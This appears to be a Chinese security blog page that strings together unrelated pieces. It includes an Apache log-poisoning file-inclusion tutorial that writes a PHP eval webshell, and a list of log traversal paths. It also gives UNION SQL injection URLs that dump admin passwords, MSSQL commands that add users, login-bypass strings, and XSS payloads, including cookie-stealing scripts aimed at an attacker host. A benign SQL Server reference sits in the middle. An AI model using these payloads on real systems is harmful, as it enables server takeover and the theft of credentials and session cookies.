0xf3sec

复制代码

复制代码

关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句，然后再被Apache服务器的日志记录，然后php 再去包含执行，从而包含了去执行。当然，这种办法最大的弊端是Apache日志肯定会过大，回应的时候当然会超时什么的，所以也是受条件限制的。全当一种 研究算了。下面是我的测试过程，我觉得很有意思，你也看看。
比如说，在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句

<? include($zizzy); ?> //包含变量$zizzy

你可以
http://xxx.com/z.php?zizzy=/etc/inetd.conf
http://xxx.com/z.php?zizzy=/proc/cpuinfo
http://xxx.com/z.php?zizzy=/etc/passwd

就可以利用包含语句来查看一些系统环境和密码档文件。

那么关于日志包含下面我们来看：
比如我们的Apache的服务器配置文件位置在这里
/usr/local/apache/conf/httpd.conf
那么我们来包含一下httpd.conf，来看下路径信息什么的
http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf

读出Apache的配置信息，这里列出部分信息。
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
</VirtualHost>

而我们提交http://xxx.com/z.php?zizzy=/home … /logs/www-error_log
就可以读出Apache的错误日志记录

[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
exist: /home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
exist: /home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
exist: /home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/kkkkkkkk

而数据日志/home/virtual/www.xxx.com/logs/www-access_log也是一样的，一样可以读出来，只不过文件会很大，那也没意思测试下去了，那怎么利用呢。

比如我们提交要提交这句，<?phpinfo();?> //查看php的相关信息
在这里，我们只能提交URL编码模式，因为我在测试中发现，<?的标记并不被记录，只有转换成URL编码提交才会被完整记录。

在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的<?phpinfo();?>，我们提交
http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E

这样肯定会报出错找不到页面，而一出错就被记在错误日志里了
http://xxx.com/z.php?zizzy=/home … /logs/www-error_log
这样这个日志文件就被包含成了phpinfo的信息，而回显也就成了一个显示php信息的页面。

如果可以的话（能够执行系统命令，也就是safe_mode开着的时候），
这样子也不错，
<?system(“ls+-la+/home”);?> //执行命令列出home下的文件列表，记得转换为URL格式哦。

/home/
total 9
-rw-r–r– 1 www.xxx.com silver 55 Jan 20 23:01 about.php
drwxrwxrwx 4 www.xxx.com silver 4096 Jan 21 06:07 abc
-rw-r–r– 1 www.xxx.com silver 1438 Dec 3 07:39 index.php
-rwxrwxrwx 1 www.xxx.com silver 5709 Jan 21 20:05 show.php
-rw-r–r– 1 www.xxx.com silver 5936 Jan 18 01:37 admin.php
-rwxrwxrwx 1 www.xxx.com silver 5183 Jan 18 15:30 config.php3
-rw-rw-rw- 1 www.xxx.com silver 102229 Jan 21 23:18 info.txt
drwxr-xr-x 2 www.xxx.com silver 4096 Jan 8 16:03 backup
-rw-r–r– 1 www.xxx.com silver 7024 Dec 4 03:07 test.php

这样就列出了home下的文件
或者直接一句话木马<?eval($_POST[cmd]);?>，
这样转换后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 这样的格式。
我们提交
http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E

再用lanker的一句话木马客户端一连就OK了。

因为上面那个很不实际，我在测试中发现日志动不动就是几十兆，那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用，也比上面那种慢的要死好很多。

比如还是这句一句话木马
<?eval($_POST[cmd]);?>

到这里你也许就想到了，这是个很不错的办法。接着看,如何写入就成了个问题，用这句，
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件，然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是

<?$fp=fopen(“/home/virtual/www.xxx.com/forum/config.php”,”w+”);fputs($fp,”<?eval($_POST[cmd]);?>”);
fclose($fp);?> //在config.php里写入一句木马语句

我们提交这句，再让Apache记录到错误日志里，再包含就成功写入shell,记得一定要转换成URL格式才成功。
转换为
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我们提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

这样就错误日志里就记录下了这行写入webshell的代码。
我们再来包含日志，提交
http://xxx.com/z.php?zizzy=/home … /logs/www-error_log

这样webshell就写入成功了，config.php里就写入一句木马语句
OK.
http://www.xxx.com/forum/config.php这个就成了我们的webshell
直接用lanker的客户端一连，主机就是你的了。

PS:上面讲的，前提是文件夹权限必须可写 ，一定要-rwxrwxrwx(777)才能继续，这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用

其他的日志路径，你可以去猜，也可以参照这里。
附：收集的一些日志路径
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

1 判断版本news_info.php?wid=-1/**/union/**/select/**/1,user(),3,4,version(),6,7,8,9,10,11,12,13,14,15/*
2 数据库名字info.php?wid=-1/**/union/**/select/** /1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15 from/**/information_schema.SCHEMATA limit 17,1/*
3表名 6进制为上面结果
info.php?wid=-1/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=0×77656262617365/**/limit/**/11,1
4 tg_adminuser十六进制编码为0x74675F61646D696E75736572，依次查找该表里面的字段名，如图4，图5
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/1,1

5数据库，表名，字段我们都知道了，查出密码就很简单了，如图六
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15/**/from/**/webbase.tg_adminuse
DECLARE @S int EXEC sp_oacreate [wscript.shell],@s out EXEC sp_oamethod @s,[run],NULL,[cmd.exe /c net user guest testa!@#$] –

DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\command.com /c net user’–

http://www.wjs168.com
绕过登录验证进入后台的方法整理：
1) ‘ or”=’
2) ‘ or 1=1–
3) ‘ or ‘a’='a–
4) ‘or’='or’
5) ” or 1=1–
6）or 1=1–
7） or ‘a=’a
8）” or “a”=”a
9） ‘) or (‘a’='a
10） “) or (“a”=”a
11） ） or (1=1
12) ‘or”=’
13) 人气%’ and 1=1 and ‘%’=’
1′or’1′=’1

阅读全文…

一、基础

1、说明：创建数据库
Create DATABASE database-name
2、说明：删除数据库
drop database dbname
3、说明：备份sql server
— 创建 备份数据的 device
USE master
EXEC sp_addumpdevice ‘disk’, ‘testBack’, ‘c:\mssql7backup\MyNwind_1.dat’
— 开始 备份
BACKUP DATABASE pubs TO testBack
4、说明：创建新表
create table tabname(col1 type1 [not null] [primary key],col2 type2 [not null],..)
根据已有的表创建新表：
A：create table tab_new like tab_old (使用旧表创建新表)
B：create table tab_new as select col1,col2… from tab_old definition only
5、说明：删除新表
drop table tabname
6、说明：增加一个列
Alter table tabname add column col type
注：列增加后将不能删除。DB2中列加上后数据类型也不能改变，唯一能改变的是增加varchar类型的长度。
7、说明：添加主键： Alter table tabname add primary key(col)
说明：删除主键： Alter table tabname drop primary key(col)
8、说明：创建索引：create [unique] index idxname on tabname(col….)
删除索引：drop index idxname
注：索引是不可更改的，想更改必须删除重新建。
9、说明：创建视图：create view viewname as select statement
删除视图：drop view viewname
10、说明：几个简单的基本的sql语句
选择：select * from table1 where 范围
插入：insert into table1(field1,field2) values(value1,value2)
删除：delete from table1 where 范围
更新：update table1 set field1=value1 where 范围
查找：select * from table1 where field1 like ’%value1%’ —like的语法很精妙，查资料!
排序：select * from table1 order by field1,field2 [desc]
总数：select count as totalcount from table1
求和：select sum(field1) as sumvalue from table1
平均：select avg(field1) as avgvalue from table1
最大：select max(field1) as maxvalue from table1
最小：select min(field1) as minvalue from table1
11、说明：几个高级查询运算词
A： UNION 运算符
UNION 运算符通过组合其他两个结果表（例如 TABLE1 和 TABLE2）并消去表中任何重复行而派生出一个结果表。当 ALL 随 UNION 一起使用时（即 UNION ALL），不消除重复行。两种情况下，派生表的每一行不是来自 TABLE1 就是来自 TABLE2。
B： EXCEPT 运算符
EXCEPT 运算符通过包括所有在 TABLE1 中但不在 TABLE2 中的行并消除所有重复行而派生出一个结果表。当 ALL 随 EXCEPT 一起使用时 (EXCEPT ALL)，不消除重复行。
C： INTERSECT 运算符
INTERSECT 运算符通过只包括 TABLE1 和 TABLE2 中都有的行并消除所有重复行而派生出一个结果表。当 ALL 随 INTERSECT 一起使用时 (INTERSECT ALL)，不消除重复行。
注：使用运算词的几个查询结果行必须是一致的。
12、说明：使用外连接
A、left outer join：
左外连接（左连接）：结果集几包括连接表的匹配行，也包括左连接表的所有行。
SQL: select a.a, a.b, a.c, b.c, b.d, b.f from a LEFT OUT JOIN b ON a.a = b.c
B：right outer join:
右外连接(右连接)：结果集既包括连接表的匹配连接行，也包括右连接表的所有行。
C：full outer join：
全外连接：不仅包括符号连接表的匹配行，还包括两个连接表中的所有记录。

二、提升

1、说明：复制表(只复制结构,源表名：a 新表名：b) (Access可用)
法一：select * into b from a where 1<>1
法二：select top 0 * into b from a
2、说明：拷贝表(拷贝数据,源表名：a 目标表名：b) (Access可用)
insert into b(a, b, c) select d,e,f from b;

3、说明：跨数据库之间表的拷贝(具体数据使用绝对路径) (Access可用)
insert into b(a, b, c) select d,e,f from b in ‘具体数据库’ where 条件
例子：..from b in ‘”&Server.MapPath(“.”)&”\data.mdb” &”‘ where..

4、说明：子查询(表名1：a 表名2：b)
select a,b,c from a where a IN (select d from b ) 或者: select a,b,c from a where a IN (1,2,3)

5、说明：显示文章、提交人和最后回复时间
select a.title,a.username,b.adddate from table a,(select max(adddate) adddate from table where table.title=a.title) b

6、说明：外连接查询(表名1：a 表名2：b)
select a.a, a.b, a.c, b.c, b.d, b.f from a LEFT OUT JOIN b ON a.a = b.c

7、说明：在线视图查询(表名1：a )
select * from (Select a,b,c FROM a) T where t.a > 1;

8、说明：between的用法,between限制查询数据范围时包括了边界值,not between不包括
select * from table1 where time between time1 and time2
select a,b,c, from table1 where a not between 数值1 and 数值2

9、说明：in 的使用方法
select * from table1 where a [not] in (‘值1’,’值2’,’值4’,’值6’)

10、说明：两张关联表，删除主表中已经在副表中没有的信息
delete from table1 where not exists ( select * from table2 where table1.field1=table2.field1 )

11、说明：四表联查问题：
select * from a left inner join b on a.a=b.b right inner join c on a.a=c.c inner join d on a.a=d.d where …..

12、说明：日程安排提前五分钟提醒
SQL: select * from 日程安排 where datediff(‘minute’,f开始时间,getdate())>5

13、说明：一条sql 语句搞定数据库分页
select top 10 b.* from (select top 20 主键字段,排序字段 from 表名 order by 排序字段 desc) a,表名 b where b.主键字段 = a.主键字段 order by a.排序字段

14、说明：前10条记录
select top 10 * form table1 where 范围

15、说明：选择在每一组b值相同的数据中对应的a最大的记录的所有信息(类似这样的用法可以用于论坛每月排行榜,每月热销产品分析,按科目成绩排名,等等.)
select a,b,c from tablename ta where a=(select max(a) from tablename tb where tb.b=ta.b)

16、说明：包括所有在 TableA 中但不在 TableB和TableC 中的行并消除所有重复行而派生出一个结果表
(select a from tableA ) except (select a from tableB) except (select a from tableC)

17、说明：随机取出10条数据
select top 10 * from tablename order by newid()

18、说明：随机选择记录
select newid()

19、说明：删除重复记录
Delete from tablename where id not in (select max(id) from tablename group by col1,col2,…)

20、说明：列出数据库里所有的表名
select name from sysobjects where type=’U’

21、说明：列出表里的所有的
select name from syscolumns where id=object_id(‘TableName’)

22、说明：列示type、vender、pcs字段，以type字段排列，case可以方便地实现多重选择，类似select 中的case。
select type,sum(case vender when ‘A’ then pcs else 0 end),sum(case vender when ‘C’ then pcs else 0 end),sum(case vender when ‘B’ then pcs else 0 end) FROM tablename group by type
显示结果：
type vender pcs
电脑 A 1
电脑 A 1
光盘 B 2
光盘 A 2
手机 B 3
手机 C 3

23、说明：初始化表table1

TRUNCATE TABLE table1

24、说明：选择从10到15的记录
select top 5 * from (select top 15 * from table order by id asc) table_别名 order by id desc

三、技巧

1、1=1，1=2的使用，在SQL语句组合时用的较多

“where 1=1” 是表示选择全部   “where 1=2”全部不选，
如：
if @strWhere !=”
begin
set @strSQL = ‘select count(*) as Total from [' + @tblName + '] where ‘ + @strWhere
end
else
begin
set @strSQL = ‘select count(*) as Total from [' + @tblName + ']‘
end

我们可以直接写成
set @strSQL = ‘select count(*) as Total from [' + @tblName + '] where 1=1 安定 ‘+ @strWhere

2、收缩数据库
–重建索引
DBCC REINDEX
DBCC INDEXDEFRAG
–收缩数据和日志
DBCC SHRINKDB
DBCC SHRINKFILE

3、压缩数据库
dbcc shrinkdatabase(dbname)

4、转移数据库给新用户以已存在用户权限
exec sp_change_users_login ‘update_one’,'newname’,'oldname’
go

5、检查备份集
RESTORE VERIFYONLY from disk=’E:\dvbbs.bak’

6、修复数据库
Alter DATABASE [dvbbs] SET SINGLE_USER
GO
DBCC CHECKDB(‘dvbbs’,repair_allow_data_loss) WITH TABLOCK
GO
Alter DATABASE [dvbbs] SET MULTI_USER
GO

7、日志清除
SET NOCOUNT ON
DECLARE @LogicalFileName sysname,
@MaxMinutes INT,
@NewSize INT

USE     tablename             — 要操作的数据库名
Select @LogicalFileName = ‘tablename_log’, — 日志文件名
@MaxMinutes = 10,               — Limit on time allowed to wrap log.
@NewSize = 1                  – 你想设定的日志文件的大小(M)

– Setup / initialize
DECLARE @OriginalSize int
Select @OriginalSize = size
FROM sysfiles
Where name = @LogicalFileName
Select ‘Original Size of ‘ + db_name() + ‘ LOG is ‘ +
CONVERT(VARCHAR(30),@OriginalSize) + ‘ 8K pages or ‘ +
CONVERT(VARCHAR(30),(@OriginalSize*8/1024)) + ‘MB’
FROM sysfiles
Where name = @LogicalFileName
Create TABLE DummyTrans
(DummyColumn char (8000) not null)

DECLARE @Counter   INT,
@StartTime DATETIME,
@TruncLog VARCHAR(255)
Select @StartTime = GETDATE(),
@TruncLog = ‘BACKUP LOG ‘ + db_name() + ‘ WITH TRUNCATE_ONLY’

DBCC SHRINKFILE (@LogicalFileName, @NewSize)
EXEC (@TruncLog)
– Wrap the log if necessary.
WHILE     @MaxMinutes > DATEDIFF (mi, @StartTime, GETDATE()) — time has not expired
AND @OriginalSize = (Select size FROM sysfiles Where name = @LogicalFileName)
AND (@OriginalSize * 8 /1024) > @NewSize
BEGIN — Outer loop.
Select @Counter = 0
WHILE ((@Counter < @OriginalSize / 16) AND (@Counter < 50000))
BEGIN — update
Insert DummyTrans VALUES (‘Fill Log’)
Delete DummyTrans
Select @Counter = @Counter + 1
END
EXEC (@TruncLog)
END
Select ‘Final Size of ‘ + db_name() + ‘ LOG is ‘ +
CONVERT(VARCHAR(30),size) + ‘ 8K pages or ‘ +
CONVERT(VARCHAR(30),(size*8/1024)) + ‘MB’
FROM sysfiles
Where name = @LogicalFileName
Drop TABLE DummyTrans
SET NOCOUNT OFF

8、说明：更改某个表
exec sp_changeobjectowner ‘tablename’,'dbo’

9、存储更改全部表

Create PROCEDURE dbo.User_ChangeObjectOwnerBatch
@OldOwner as NVARCHAR(128),
@NewOwner as NVARCHAR(128)
AS

DECLARE @Name   as NVARCHAR(128)
DECLARE @Owner as NVARCHAR(128)
DECLARE @OwnerName as NVARCHAR(128)

DECLARE curObject CURSOR FOR
select ‘Name’   = name,
‘Owner’   = user_name(uid)
from sysobjects
where user_name(uid)=@OldOwner
order by name

OPEN curObject
FETCH NEXT FROM curObject INTO @Name, @Owner
WHILE(@@FETCH_STATUS=0)
BEGIN
if @Owner=@OldOwner
begin
set @OwnerName = @OldOwner + ‘.’ + rtrim(@Name)
exec sp_changeobjectowner @OwnerName, @NewOwner
end
– select @name,@NewOwner,@OldOwner

FETCH NEXT FROM curObject INTO @Name, @Owner
END

close curObject
deallocate curObject
GO

10、SQL SERVER中直接循环写入数据
declare @i int
set @i=1
while @i<30
begin
insert into test (userid) values(@i)
set @i=@i+1
end

XSS] Useful injections when you have a vulnerable site

——————————————————————————–
</textarea><script>alert(/xss/)</script>
</title><script>alert(/xss/)</script>
<script src=http://yoursite.com/your_files.js></script>
“><script>alert(0)</script>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=\”jav&#x0D;ascript:alert(‘XSS’);\”>
<IMG SRC=\”jav&#x0A;ascript:alert(‘XSS’);\”>
<IMG SRC=\”jav&#x09;ascript:alert(‘XSS’);\”>
<marquee><script>alert(‘XSS’)</script></marquee>
<? echo(‘<scr)’;echo(‘ipt>alert(\”XSS\”)</script>’); ?>
<style>@im\port’\ja\vasc\ript:alert(\”XSS\”)’;</style>
<img src=foo.png onerror=alert(/xssed/) />
<script>alert(String.fromCharCode(88,83,83))</script>
<scr<script>ipt>alert(‘XSS’);</scr</script>ipt>
<script>location.href=”http://www.yourevilsite.org/cookiegrabber.php?cookie=”+escape(document.cookie)</script>
<script src=”http://www.yourevilsite.org/cookiegrabber.php”></script>
<script>alert(‘XSS’);</script>
<script>alert(1);</script>
<IMG LOWSRC=\”javascript:alert(‘XSS’)\”>
<IMG DYNSRC=\”javascript:alert(‘XSS’)\”>
<font style=’color:expression(alert(document.cookie))’>
<img src=”javascript:alert(‘XSS’)”>
<script language=”JavaScript”>alert(‘XSS’)</script>
<body onunload=”javascript:alert(‘XSS’);”>
<body onLoad=”alert(‘XSS’);”
[color=red' onmouseover="alert('xss')"]mouse over[/color]
“/></a></><img src=1.gif onerror=alert(1)>
window.alert(“Bonjour !”);
<div style=”x:expression((window.r==1)?”:eval(‘r=1;alert(String.fromCharCode(88,83,83));’))”>
<iframe<?php echo chr(11)?> onload=alert(‘XSS’)></iframe>
“><script alert(String.fromCharCode(88,83,83))</script>
‘>><marquee><h1>XSS</h1></marquee>
‘”>><script>alert(‘XSS’)</script>
‘”>><marquee><h1>XSS</h1></marquee>
<META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”>
<META HTTP-EQUIV=\”refresh\” CONTENT=\”0;URL=http://;URL=javascript:alert(‘XSS’);\”>
<script>var var = 1; alert(var)</script>
<STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)&quot;)}</STYLE>
<?=’<SCRIPT>alert(“XSS”)</SCRIPT>’?>
<IMG SRC=’vbscript:msgbox(\”XSS\”)’>
” onfocus=alert(document.domain) “> <”
<FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET>
<STYLE>li {list-style-image:url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS
perl -e ‘print \”<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>\”;’ > out
perl -e ‘print \”<IMG SRC=java\0script:alert(\”XSS\”)>\”;’ > out
<br size=\”&{alert(‘XSS’)}\”>